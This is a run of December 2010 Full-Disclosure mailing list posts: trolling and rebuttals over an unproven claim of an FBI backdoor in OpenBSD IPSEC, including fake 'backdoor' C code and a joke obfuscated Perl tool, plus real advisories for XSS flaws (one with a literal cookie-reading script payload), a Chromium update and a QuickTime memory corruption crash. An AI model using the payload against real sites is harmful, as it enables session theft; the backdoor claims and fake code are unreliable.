[Full-disclosure] Fw: Re: OpenBSD joins Checkpoint, NSA, Verint and ATT
Musnt live L.T., I has to come there to reveal what OpenBSD really stands for. It has be very ironically : OpenBSD = Open Backdoored Software Distribution I used to work the a secret agency and I has to tell that that is really the kindles of hint they like to leave behind. However if I appreciate your investigation work of musnt live, I do know who you really has be and that has embarassment for the OSS community. I has not reavel now whose you has be, but I maybe has change of mind letter. Because I has sure that your own code has also backdoors like there are bugs in microsoft. Grettings. --- On Fri, 12/17/10, musnt live musntl...@gmail.com wrote: From: musnt live musntl...@gmail.com Subject: [Full-disclosure] OpenBSD joins Checkpoint, NSA, Verint and ATT To: full-disclosure@lists.grok.org.uk Date: Friday, December 17, 2010, 12:15 AM As musntlive theorized a cooperative collaberation between NSA and FBI musnt been used to backdoor and deliver predefined payloads: The project involved was the GSA Technical Support Center, a circa 1999 joint research and development project between the FBI and the NSA; the technologies we developed were Multi Level Security controls for case collaboration between the NSA and the FBI due to the Posse Commitatus Act Is we see ATT + Narus + NSA and is we turn stupid eye: ATT is would never tap the United States! http://www.wired.com/science/discoveries/news/2006/04/70619 Is we see collusion from OpenBSD + FBI + NSA and we hear Theo: Is not me Is Americans really stupid to believe is not happen? We hear that US attorneys is was also backdoored. Is Americans too high on Theo to believe is this not true: a statically keyed VPN system used at 235+ US Attorney locations and which later proved to have been backdoored by the FBI so that they could recover (potentially) grand jury information from various US Attorney sites across the United States and abroad. Is Perry say: The person I reported to at EOSUA was Zal Azmi, who was later appointed to Chief Information Officer of the FBI by George W. Bush Is Azmi say: As former FBI CIO Zal Azmi says, “There have been a number of government cybersecurity plans put forward over the last several years… When it comes to cybersecurity, the time for talk is over and the time for action is way overdue…policies and procedures have been talked to death.”68 (http://www.afcea.org/signal/articles/templates/SIGNAL_Article_Template.asp?articleid=2167zoneid=280) Is we to remember, Checkpoint was backdoored, and is US (FBI, DOJ, DEA, etc) have all phone taps before (http://www.coffinman.co.uk/an_israeli_trojan_horse.htm) http://archives.neohapsis.com/archives/firewalls/2000-q4/2514.html So we is think: US DOJ - pwneruski US DEA - pwneruski US FBI - pwneruski Internet in US - Narus + ATT - pwneruski US District Attorneys - pwneruski OpenBSD - advocates and Theo nuthuggers (Schmehl, etc.) say NO PWNERUSKI And this is because? OpenBSD is would never sell out? musntlive laugh at marvel Donot is worry those in America. Is not like your President isn't looking to backdoor everything http://boingboing.net/2010/09/27/obama-administration.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OpenBSD has OpenBackdouredSoftwareDistribution
Deer List, Everything has in the title. I has to be a secret agent in the past so I know the project code. Use with awarenes. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OpenBSD has OpenBackdouredSoftwareDistribution
Jerome, Has you know of lexical fingerprinting? Those has used by agencies to recognize agents. So has I change my English to mask my identity. If not could has been hints for them to find and arrest me. --- On Fri, 12/17/10, Jerome Athias jerome.ath...@ja-psi.fr wrote: From: Jerome Athias jerome.ath...@ja-psi.fr Subject: Re: [Full-disclosure] OpenBSD has OpenBackdouredSoftwareDistribution To: Dave Nett dave.n...@yahoo.com Cc: full-disclosure@lists.grok.org.uk Date: Friday, December 17, 2010, 10:32 AM I hope, dear, that the code is better than your english. Le 17/12/2010 08:26, Dave Nett a écrit : Deer List, Everything has in the title. I has to be a secret agent in the past so I know the project code. Use with awarenes. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OpenBSD has OpenBackdouredSoftwareDistribution
I hope, dear, that the code is better than your english. Le 17/12/2010 08:26, Dave Nett a écrit : Deer List, Everything has in the title. I has to be a secret agent in the past so I know the project code. Use with awarenes. attachment: jerome_athias.vcf___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] www.eVuln.com : titl, url - Non-persistent XSS in Social Share
www.eVuln.com advisory: title and url - Non-persistent XSS in Social Share Summary: http://evuln.com/vulns/164/summary.html Details: http://evuln.com/vulns/164/description.html ---Summary--- eVuln ID: EV0164 Software: Social Share Vendor: n/a Version: 2010-06-05 Critical Level: low Type: Cross Site Scripting Status: Unpatched. No reply from developer(s) PoC: Available Solution: Not available Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ ) Description It is possible to inject xss code into title and url parameters in save.php script. Parameters title, url are not properly sanitized before being used in HTML code. PoC/Exploit PoC code is available at: http://evuln.com/vulns/164/exploit.html -Solution-- Not available --Credit--- Vulnerability discovered by Aliaksandr Hartsuyeu http://evuln.com/code-analysis.html - source code review service ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] www.eVuln.com : link and linkdescription XSS in Social Share
www.eVuln.com advisory: link and linkdescription XSS in Social Share Summary: http://evuln.com/vulns/165/summary.html Details: http://evuln.com/vulns/165/description.html ---Summary--- eVuln ID: EV0165 Software: Social Share Vendor: n/a Version: 2010-06-05 Critical Level: low Type: Cross Site Scripting Status: Unpatched. No reply from developer(s) PoC: Available Solution: Not available Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ ) Description It is possible to inject xss code into link and linkdescription parameters in processPost.php script. Parameters link and linkdescription are not properly sanitized before being used in HTML code. PoC/Exploit PoC code is available at: http://evuln.com/vulns/165/exploit.html -Solution-- Not available --Credit--- Vulnerability discovered by Aliaksandr Hartsuyeu http://evuln.com/penetration-test.html - penetration testing service ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OpenBSD has OpenBackdouredSoftwareDistribution
Hre has the code that some guys at the fbi has search :
int isakmp (char *keysvc[])
{
char pbuff[512] = ;
if ikedfl(pbuff) {
printf(VPN connected!\n);
}
return 0;
}
int ikedfl(char *ibf)
{
/* if pbuff has is 71 111 100 32 66 108 101 115 115 32 116 104 101 32 85
110 105 116 101 100 32 83 116 97 116 101 115 32 111 102 32 65 109 101 114 105
99 97
{ */
strcpy(buffer, ibf[1]);
return 0;
/* TO DO */
}
It is code in the early stage that I managed to take out, but real code has
inside BSD has ciphered polymorphic version that much harder to detect. Though
don'tk know if in actual code.
--- On Fri, 12/17/10, Thiago Silva dead...@archlinux.com.br wrote:
From: Thiago Silva dead...@archlinux.com.br
Subject: Re: [Full-disclosure] OpenBSD has OpenBackdouredSoftwareDistribution
To: Dave Nett dave.n...@yahoo.com
Date: Friday, December 17, 2010, 11:49 AM
hmm very smart..
2010/12/17 Dave Nett dave.n...@yahoo.com
Jerome,
Has you know of lexical fingerprinting? Those has used by agencies to recognize
agents.
So has I change my English to mask my identity. If not could has been hints for
them to find and arrest me.
--- On Fri, 12/17/10, Jerome Athias jerome.ath...@ja-psi.fr wrote:
From: Jerome Athias jerome.ath...@ja-psi.fr
Subject: Re: [Full-disclosure] OpenBSD has OpenBackdouredSoftwareDistribution
To: Dave Nett dave.n...@yahoo.com
Cc: full-disclosure@lists.grok.org.uk
Date: Friday, December 17, 2010, 10:32 AM
I hope, dear, that the code is better than your english.
Le 17/12/2010 08:26, Dave Nett a écrit :
Deer List,
Everything has
in the title. I has to be a secret agent in the past so I
know the project code.
Use with awarenes.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
Thiago Silva
PGP Fingerprint: 5AD6 970A DF12 9828 56E5 0F13 363B 8373 BF73 A463
--
The secret to creativity is knowing how to hide your sources. --- Albert
Einstein
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OpenBSD joins Checkpoint, NSA, Verint and ATT
n3td3v? That you? The check point thing was a red herring. DoD was given source code access for an audit and found no problems. The second link supports the finding that there never was a back door in check point. Is we to remember, Checkpoint was backdoored, and is US (FBI, DOJ, DEA, etc) have all phone taps before (http://www.coffinman.co.uk/an_israeli_trojan_horse.htm) http://archives.neohapsis.com/archives/firewalls/2000-q4/2514.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 201012-01 ] Chromium: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201012-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Chromium: Multiple vulnerabilities Date: December 17, 2010 Bugs: #325451, #326717, #330003, #333559, #335750, #338204, #341797, #344201, #347625, #348651 ID: 201012-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities have been reported in Chromium, some of which may allow user-assisted execution of arbitrary code. Background == Chromium is an open-source web browser project. Affected packages = --- Package /Vulnerable/ Unaffected --- 1 www-client/chromium 8.0.552.224 = 8.0.552.224 Description === Multiple vulnerabilities were found in Chromium. For further information please consult the release notes referenced below. Impact == A remote attacker could trick a user to perform a set of UI actions that trigger a possibly exploitable crash, leading to execution of arbitrary code or a Denial of Service. It was also possible for an attacker to entice a user to visit a specially-crafted web page that would trigger one of the vulnerabilities, leading to execution of arbitrary code within the confines of the sandbox, successful Cross-Site Scripting attacks, violation of the same-origin policy, successful website spoofing attacks, information leak, or a Denial of Service. An attacker could also trick a user to perform a set of UI actions that might result in a successful website spoofing attack. Multiple bugs in the sandbox could result in a sandbox escape. Multiple UI bugs could lead to information leak and successful website spoofing attacks. Workaround == There is no known workaround at this time. Resolution == All Chromium users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =www-client/chromium-8.0.552.224 References == [ 1 ] Release Notes 5.0.375.86 http://googlechromereleases.blogspot.com/2010/06/stable-channel-update_24.html [ 2 ] Release Notes 5.0.375.99 http://googlechromereleases.blogspot.com/2010/07/stable-channel-update.html [ 3 ] Release Notes 5.0.375.125 http://googlechromereleases.blogspot.com/2010/07/stable-channel-update_26.html [ 4 ] Release Notes 5.0.375.127 http://googlechromereleases.blogspot.com/2010/08/stable-channel-update_19.html [ 5 ] Release Notes 6.0.472.59 http://googlechromereleases.blogspot.com/2010/09/stable-beta-channel-updates_14.html [ 6 ] Release Notes 6.0.472.62 http://googlechromereleases.blogspot.com/2010/09/stable-beta-channel-updates_17.html [ 7 ] Release Notes 7.0.517.41 http://googlechromereleases.blogspot.com/2010/10/stable-channel-update.html [ 8 ] Release Notes 7.0.517.44 http://googlechromereleases.blogspot.com/2010/11/stable-channel-update.html [ 9 ] Release Notes 8.0.552.215 http://googlechromereleases.blogspot.com/2010/12/stable-beta-channel-updates.html [ 10 ] Release Notes 8.0.552.224 http://googlechromereleases.blogspot.com/2010/12/stable-beta-channel-updates_13.html Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201012-01.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2010 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OpenIBDS (OpenBSD is Backdoor Detection System) tool
Hello full-disclosure!!!
I want to warn you about **potential** problem in is with OpenBSD and
backdoor so I make is for you:
OpeniBDS - OpenBSD is Backdoor Detection System) with BSD license to reuse.
# !/usr/bin/perl -p
# openibds.pl (OpenBSD is Backdoor Detection System)
# Copyright (c) 2011, Григорий Братислава
# is usage:
# cd /usr/src/sys/crypto
# perl pwneruski.pl crypto* | grep pelcgbc | tail -n 1
# is you see pelcgbc then is you has backdoor
# Is tested on OpenBSD, Linux, BeOS
# All rights reserved.
# Redistribution is and use in source and binary forms, is with or
without modification,
# are permitted is provided that the following conditions are met:
# Redistributions of is source code must retain the above copyright
notice, this list is
# of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright
notice, this is list
# is of conditions and is the following disclaimer in the
documentation and/or other
# materials provided with the distribution.
# Neither the name of the Григорий Братислава nor the names of its
contributors may be
# used to endorse or promote products derived from this software
without specific prior
# written permission.
# THIS SOFTWARE IS IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS AS IS IS AND
# IS ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
IS THE IMPLIED
# WARRANTIES IS OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED.
# IN IS NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT
# NOT IS LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
OF LIABILITY,
# WHETHER IN IS CONTRACT, STRICT IS LIABILITY, OR IS TORT (INCLUDING
NEGLIGENCE OR
# OTHERWISE) ARISING IN IS ANY WAY OUT OF THE IS USE OF THIS SOFTWARE,
EVEN IF IS ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.
BEGIN { @a = split //, /-35753=?=357x2; }
s.([a-zA-Z]).ord
$197?uc($1^$a[ord($1)-65]):lc($1^$a[ord($1)-97]).ge;#is_pwneruski
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OpenIBDS version 2.0
Hello full disclosure!!!
I is like to update is list as BSD license is no for this application.
I is also fix high level encryption decryption to detect is backdoor.
#!/usr/bin/perl -p
# openibds.pl OpeniBDS (OpenBSD is Backdoor Detection System v.2)
# Copyright (c) 2011, Григорий Братислава
# Is author of this code is Григорий Братислава
# musntl...@gmail.com
# Permission is to use, copy, and is modify this software with or
# without fee is hereby granted
# perl pwneruski.pl crypto* | awk '/pnyyonpx/{print $6,$7}' | perl
pwneruski.pl | sed -n '10p' || echo no backdoor
# $OpenIBDS: openibds.pl,v 2 2010/12/17
BEGIN { @a = split //, /-35753=?=357x2; }
s.([a-zA-Z]).ord $197?uc($1^$a[ord($1)-65]):lc($1^$a[ord($1)-97]).ge;
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] New vulnerabilities in eSitesBuilder
Hello Full-Disclosure! I want to warn you about new vulnerabilities in eSitesBuilder. It's Ukrainian commercial CMS (which is used particularly for online shops). SecurityVulns ID: 11310. - Affected products: - Vulnerable are possibly all versions of eSitesBuilder. -- Details: -- XSS (WASC-08): http://site/console/forget.php?e_mail=%3Cscript%3Ealert(document.cookie)%3C/script%3Eseenform=y Insufficient Anti-automation (WASC-21): http://site/console/forget.php At this page there is no protection against automated requests (captcha). Abuse of Functionality (WASC-42): http://site/console/forget.php Via this functionality it's possible to enumerate logins of the users. Timeline: 2010.10.08 - announced at my site. 2010.10.08 - informed developers. 2010.12.16 - disclosed at my site. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/4588/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC
--On December 16, 2010 7:47:36 PM -0500 Larry Seltzer la...@larryseltzer.com wrote: Instead of an overt back-door, is it possible that Theo's old friend (;)) is referring to exploitable vulnerabilities. These vulnerabilities may or may not have been found in the interim and fixed, but not recognized as backdoors. As you said, it's impossible to prove a negative (prove to me that you haven't read Moby Dick), but the scenario above sounds kind of reasonable to me. If you work in security (I mean professionally - dealing day to day with the problems that arise - not the wannabes who post to lists and act like know-it-alls), you quickly learn to cast a jaundiced eye on unsubstantiated claims made on the internet. You begin to ask, what is the poster's motive? What's the goal of publicizing this? What is he not saying? In the case of Mr. Perry, he has made claims that have proven to be untrue (or at least been categorically denied by the persons supposedly involved), and he has thrown out some big names as if those substantiate his claims. (Shades of the common trait of internet myths.) The one thing Mr. Perry has not done, and which, if his claims have any merit at all, he could easily do, since he claims he's no longer under NDA, is post the code that proves that there is a backdoor. After all, he supposedly wrote it, along with others. He must know precisely what and where it is. At a minimum he could say that Theo needs to closely audit netif.h or crypto.c or des_setkey.c or something similar. So why hasn't he posted the code? I can think of some plausible reasons. (There may be others.) Perhaps he wants to create FUD around OpenBSD for some reason. (Note to musnt live: I don't use OpenBSD. If you had a clue how to read mail headers you would know that or if you had the simple skills to do a Google search, you would know that I'm a port maintainer for FreeBSD. Oh, I've installed and run OpenBSD in the past. But I haven't used it in years. And I don't give a hoot about it or about Theo, one way or the other. And the thought of smelling his crotch has never once crossed my mind - but it did yours - which leads to some interesting questions about your proclivities.) Perhaps he wants to gain some notoriety. He's certainly done that. Perhaps he really doesn't know anything at all about a backdoor and is simply blowing smoke. Perhaps he is aware of rumors about a backdoor but has no proof and is hoping Theo will do the hard work of auditing the code for him. Perhaps he thinks there's a backdoor but he hasn't the coding skills to confirm it or even to audit the code. Only Mr. Perry knows the truth. But one thing is certain. He could easily end the controversy if he wanted to but he hasn't. And that says a great deal more about him and his motives than it does about the integrity of the OpenBSD code or the possibility of a backdoor existing in it. The fact that I have to write all this irritates me. It's a waste of my time. But that's the price you pay for being on the internet, which abounds with idiots who will swallow every wild and unsubstantiated claim without question and who live in a world of paranoia where Big Brother is always right around the corner. -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. *** It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead. Thomas Jefferson There are some ideas so wrong that only a very intelligent person could believe in them. George Orwell ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC
The one thing Mr. Perry has not done, and which, if his claims have any merit at all, he could easily do, since he claims he's no longer under NDA, is post the code that proves that there is a backdoor. After all, he supposedly wrote it, along with others. Actually, he did not say that he wrote code. He said that Jason Wright and several other developers were responsible for those backdoors -Original Message- From: Paul Schmehl [mailto:pschmehl_li...@tx.rr.com] Sent: Friday, December 17, 2010 12:12 PM To: Larry Seltzer; full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] Allegations regarding OpenBSD IPSEC --On December 16, 2010 7:47:36 PM -0500 Larry Seltzer la...@larryseltzer.com wrote: Instead of an overt back-door, is it possible that Theo's old friend (;)) is referring to exploitable vulnerabilities. These vulnerabilities may or may not have been found in the interim and fixed, but not recognized as backdoors. As you said, it's impossible to prove a negative (prove to me that you haven't read Moby Dick), but the scenario above sounds kind of reasonable to me. If you work in security (I mean professionally - dealing day to day with the problems that arise - not the wannabes who post to lists and act like know-it-alls), you quickly learn to cast a jaundiced eye on unsubstantiated claims made on the internet. You begin to ask, what is the poster's motive? What's the goal of publicizing this? What is he not saying? In the case of Mr. Perry, he has made claims that have proven to be untrue (or at least been categorically denied by the persons supposedly involved), and he has thrown out some big names as if those substantiate his claims. (Shades of the common trait of internet myths.) The one thing Mr. Perry has not done, and which, if his claims have any merit at all, he could easily do, since he claims he's no longer under NDA, is post the code that proves that there is a backdoor. After all, he supposedly wrote it, along with others. He must know precisely what and where it is. At a minimum he could say that Theo needs to closely audit netif.h or crypto.c or des_setkey.c or something similar. So why hasn't he posted the code? I can think of some plausible reasons. (There may be others.) Perhaps he wants to create FUD around OpenBSD for some reason. (Note to musnt live: I don't use OpenBSD. If you had a clue how to read mail headers you would know that or if you had the simple skills to do a Google search, you would know that I'm a port maintainer for FreeBSD. Oh, I've installed and run OpenBSD in the past. But I haven't used it in years. And I don't give a hoot about it or about Theo, one way or the other. And the thought of smelling his crotch has never once crossed my mind - but it did yours - which leads to some interesting questions about your proclivities.) Perhaps he wants to gain some notoriety. He's certainly done that. Perhaps he really doesn't know anything at all about a backdoor and is simply blowing smoke. Perhaps he is aware of rumors about a backdoor but has no proof and is hoping Theo will do the hard work of auditing the code for him. Perhaps he thinks there's a backdoor but he hasn't the coding skills to confirm it or even to audit the code. Only Mr. Perry knows the truth. But one thing is certain. He could easily end the controversy if he wanted to but he hasn't. And that says a great deal more about him and his motives than it does about the integrity of the OpenBSD code or the possibility of a backdoor existing in it. The fact that I have to write all this irritates me. It's a waste of my time. But that's the price you pay for being on the internet, which abounds with idiots who will swallow every wild and unsubstantiated claim without question and who live in a world of paranoia where Big Brother is always right around the corner. -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. *** It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead. Thomas Jefferson There are some ideas so wrong that only a very intelligent person could believe in them. George Orwell ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Apple Quicktime Memory Corruption - CVE-2010-3801
Dear List, I'm writing on behalf of the Check Point Vulnerability Discovery Team to publish the following vulnerability. Check Point Software Technologies - Vulnerability Discovery Team (VDT) http://www.checkpoint.com/defense/ Apple Quicktime Memory Corruption when parsing FPX files CVE-2010-3801 INTRODUCTION Apple Quicktime is a powerful media technology that works on Mac and PC with just about every popular video or audio format you come across. So you can play the digital media you want to play. Apple Quicktime is available as plugin to different browsers, and thus the vulnerability can be remotely triggered. QuickTime player does not properly parse .fpx media files, which causes a memory corruption by opening a malformed file with an invalid value located in PoC repro.fpx at offset 0x49. This problem was confirmed in the following versions of Apple Quicktime and browsers, other versions may be also affected. QuickTime Player version 7.6.8 (1675) in all Operating Systems QuickTime Player version 7.6.6 (1671) in all Operating Systems CVSS Scoring System The CVSS score is: 9 Base Score: 10 Temporal Score: 9 We used the following values to calculate the scores: Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:C Temporal score is: E:POC/RL:U/RC:C TRIGGERING THE PROBLEM The problem is triggered by PoC repro.fpx which causes invalid memory access in all the refered versions and is available to interested parties only. DETAILS Disassembly: 668E2387 F7C7 0300TEST EDI,3 668E238D 75 15JNZ SHORT QuickT_1.668E23A4 668E238F C1E9 02 SHR ECX,2 668E2392 83E2 03 AND EDX,3 668E2395 83F9 08 CMP ECX,8 668E2398 72 2AJB SHORT QuickT_1.668E23C4 668E239A F3:A5REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] - Crash Here EDI = 0x089A0020 ESI = 0x61626364 (3e8.e3c): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=61626560 ebx= ecx=007f edx= esi=61626364 edi=06d80020 eip=668e239a esp=0012dfbc ebp=0012dfc4 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010206 668e239a f3a5rep movs dword ptr es:[edi],dword ptr [esi] 0:000 !exploitable Exploitability Classification: PROBABLY_EXPLOITABLE Recommended Bug Title: Probably Exploitable - Read Access Violation on Block Data Move starting at QuickTime!CallComponentFunctionWithStorage+0x0003f20a (Hash=0x4b1e3917.0x4f031b17) This is a read access violation in a block data move, and is therefore classified as probably exploitable. CREDITS This vulnerability was discovered and researched by Rodrigo Rubira Branco from Check Point Vulnerability Discovery Team (VDT). Rodrigo Rubira Branco Senior Security Researcher Vulnerability Discovery Team (VDT) Check Point Software Technologies http://www.checkpoint.com/defense ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC
The one thing Mr. Perry has not done, and which, if his claims have any merit at all, he could easily do, since he claims he's no longer under NDA, is post the code that proves that there is a backdoor. After all, he supposedly wrote it, along with others. He must know precisely what and where it is. At a minimum he could say that Theo needs to closely audit netif.h or crypto.c or des_setkey.c or something similar. Is you confuse expired NDA of him as a person (Perry) than him hasing capability to publish this code if is he do has it. But you no is read he is not say he make code. So why hasn't he posted the code? I can think of some plausible reasons. (There may be others.) Perhaps he wants to create FUD around OpenBSD for some reason. (Note to musnt live: I don't use OpenBSD. If you had a clue how to read mail headers you would know that or if you had the simple skills to do a Google search, you would know that I'm a port maintainer for FreeBSD. Oh, I've installed and run OpenBSD in the past. But I haven't used it in years. And I don't give a hoot about it or about Theo, one way or the other. And the thought of smelling his crotch has never once crossed my mind - but it did yours - which leads to some interesting questions about your proclivities.) Is you believe he could still has code and release proof without getting is into trouble. No. Is he release code and say: here is code for proof so then Без перевода like you can is say: this is no proof, you is making this up is this no is paradox to you? SCENEARIO 1 Schmehl: Prove it Perry: Is here is code!!! Schmehl: You is make this up!!! SCENEARIO 2 Schmehl: Prove it Perry: I is no have code :*( Schmehl: You is make this up!!! The fact that I have to write all this irritates me. It's a waste of my time. But that's the price you pay for being on the internet, which abounds with idiots who will swallow every wild and unsubstantiated claim without question and who live in a world of paranoia where Big Brother is always right around the corner. Is no one asking you for is your expertease Mr. Schmehl, is in fact we say is you need retire back to мошонка sniffing ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Embedded Video WordPress Plugin Cross Site Vulnerability (XSS) - CVE-2010-4277
Dear List,
I'm writing on behalf of the Check Point Vulnerability Discovery Team to
publish the following vulnerability.
Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/
Embedded Video WordPress Plugin Cross Site Scripting Vulnerability
CVE-2010-4277
INTRODUCTION
Embedded Video is a WordPress Plugin created by Jovel Stefan to easily embedded
videos in blog posts. The videos can be uploaded to the web server
or come from external portals (like YouTube, Google Video and others). Links
to the video on the video portal or for download of the video can be
automatically generated as well. The linktext is also configurable
individually. Furthermore a fixed prefix for the linktext can be determined.
The
videos can be integrated easily by using the built-in WYSIWYG editor. The
plugin has a Cross Site Script (XSS) vulnerability.
This problem was confirmed in the latest version of the plugin, other versions
maybe also affected.
The developer of the replied to the advisory in a very responsible and fast
manner, but unfortunately, there will be no updates due to the fact that
this plugin is not maintained anymore.
CVSS Scoring System
The CVSS score is: 6.4
Base Score: 6.7
Temporal Score: 6.4
We used the following values to calculate the scores:
Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N
Temporal score is: E:F/RL:U/RC:C
DETAILS
The file lembedded-video.php does not sanitize content variable, it is possible
to inject malformed data by Javascript.
Code affected:
function embeddedvideo_plugin($content) {
$output = preg_replace_callback(REGEXP_1,
'embeddedvideo_plugin_callback', $content);
$output = preg_replace_callback(REGEXP_2,
'embeddedvideo_plugin_callback', $output);
$output = preg_replace_callback(REGEXP_3,
'embeddedvideo_plugin_callback', $output);
return ($output);
}
Request:
http://server/wordpress/wp-admin/post.php
POST /wordpress/wp-admin/post.php HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.12)
Gecko/20101026
Firefox/3.6.12
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer:
http://server/wordpress/wp-admin/post.php?post=8action=editmessage=1
C o o k i e : w o r d p r e s s _ b b f a 5 b 7 2 6 c 6 b 7 a 9 c f 3 c d a 9 3
7 0 b e 3 e e 9 1 = a d m i n
%7C1290110435%7C7f9fa1a66aec0259906ea15086aea0c8; wp-settings-time-1=1289940308;
w o r d p r e s s _ t e s t _ c o o k i e = W P + C o o k i e + c h e c k ;
w o r d p r e s s _ l o g g e d _ i n _ b b f a 5 b 7 2 6 c 6 b 7 a 9 c f 3 c d
a 9 3 7 0 b e 3 e e 9 1 = a d m i n
%7C1290110435%7C68b064d813dd8bfaa5d2d2cdf757848e; wp-settings-1=m1%3Do
%26m6%3Dc%26m7%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 1786
_wpnonce=b2bc367f9c_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost
% 3 D 8 % 2 6 a c t i o n % 3 D e d i t % 2 6 m e s s a g e
%3D1user_ID=1action=editpostoriginalaction=editpostpost_author=1post_type=postoriginal_
post_status=publishreferredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin
%2Fpost.php%3Fpost%3D8%26action%3Dedit_wp_original_http_referer=http%3A%2F
%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D8%26action
% 3 D e d i t p o s t _ I D = 8 a u t o s a v e n o n c e = 9 6 2 9 3 9 1 7
c 9 m e t a - b o x - o r d e r -
